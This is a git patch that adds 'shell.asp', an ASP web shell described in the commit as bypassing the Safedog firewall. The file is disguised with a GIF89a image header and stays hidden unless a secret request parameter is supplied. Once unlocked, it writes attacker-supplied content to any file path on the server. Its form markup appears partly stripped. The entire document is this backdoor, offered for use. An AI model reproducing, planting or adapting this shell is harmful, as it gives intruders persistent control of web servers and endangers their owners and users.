From 3e06df61e51b6b8aa6a1644564da78c0725e54fc Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 18 Oct 2013 08:17:22 +0800 Subject: [PATCH] update asp shell a asp shell bypass safedog --- asp/shell.asp | 44 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 asp/shell.asp diff --git a/asp/shell.asp b/asp/shell.asp new file mode 100644 index 0000000..11e6420 --- /dev/null +++ b/asp/shell.asp @@ -0,0 +1,44 @@ +GIF89a$ ; +<% if request("miemie")="av" then %> +<% +on error resume next +testfile=Request.form("2010") +if Trim(request("2010"))<>"" then +set fs=server.CreateObject("scripting.filesystemobject") +set thisfile=fs.CreateTextFile(testfile,True) +thisfile.Write(""&Request.form("1988") & "") +if err =0 Then +response.write"Success" +else +response.write"False" +end if +err.clear +thisfile.close +set fs = nothing +End if +%> + +Welcome To AK Team +
+">
+ + +
- BY F4ck
+
+<% end if %> + + +shell.asp?miemie=av \ No newline at end of file